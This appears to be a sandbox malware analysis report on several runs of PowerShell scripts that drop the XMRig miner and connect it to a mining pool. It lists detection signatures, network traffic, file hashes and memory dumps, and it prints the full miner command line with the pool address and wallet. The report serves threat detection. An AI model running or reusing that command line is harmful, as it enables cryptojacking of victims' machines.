memory/4828-111-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-112-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-113-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-114-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-115-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-116-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-117-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-118-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-119-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-120-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-121-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-122-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-123-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-124-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-125-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-126-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-127-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-128-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-129-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-130-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-131-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-132-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-133-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-134-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-135-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-136-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-137-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-138-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-139-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-140-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-141-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-142-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-143-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-144-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-145-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-146-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-147-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-148-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-149-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-150-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-151-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-152-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-153-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-154-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-155-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-156-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:10

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(the sandbox repeats this empty row 64 times for this rule; no per-match detail was extracted)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 (none) tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/4240-0-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-5-0x00000163BAAB0000-0x00000163BAAD2000-memory.dmp

memory/4240-7-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-10-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-9-0x00000163BAB60000-0x00000163BABD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3tko2aq.na4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4240-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-48-0x00000163BAD10000-0x00000163BAD22000-memory.dmp

memory/4240-61-0x00000163BACE0000-0x00000163BACEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1404-90-0x00000240EE7B0000-0x00000240EE7D0000-memory.dmp

memory/1404-91-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/4240-92-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-93-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1404-94-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/4240-95-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1404-96-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-97-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-98-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-99-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-100-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-101-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-102-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-103-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-104-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-105-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-106-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-107-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-108-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-109-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-110-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-111-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-112-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-113-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-114-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-115-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-116-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-117-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-118-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-119-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-120-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-121-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-122-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-123-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-124-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-125-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-126-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-127-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-128-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-129-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-130-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-131-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-132-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-133-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-134-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-135-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-136-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-137-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-138-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-139-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-140-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-141-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-142-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-143-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-144-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-145-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-146-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-147-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-148-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-149-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-150-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-151-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-152-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-153-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-154-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-155-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-156-0x00007FF676930000-0x00007FF677563000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:12

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(the sandbox repeats this empty row 64 times for this rule; no per-match detail was extracted)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

memory/644-0-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/644-3-0x0000022770440000-0x0000022770462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ct3kobcq.nuq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:49

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vaw3bafx.s1k.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:54

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp

Files

memory/1892-0-0x00007FF85BA30000-0x00007FF85BB5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdetur5z.nvs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win7-20240215-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:18

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wbpjnaxp.kz0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
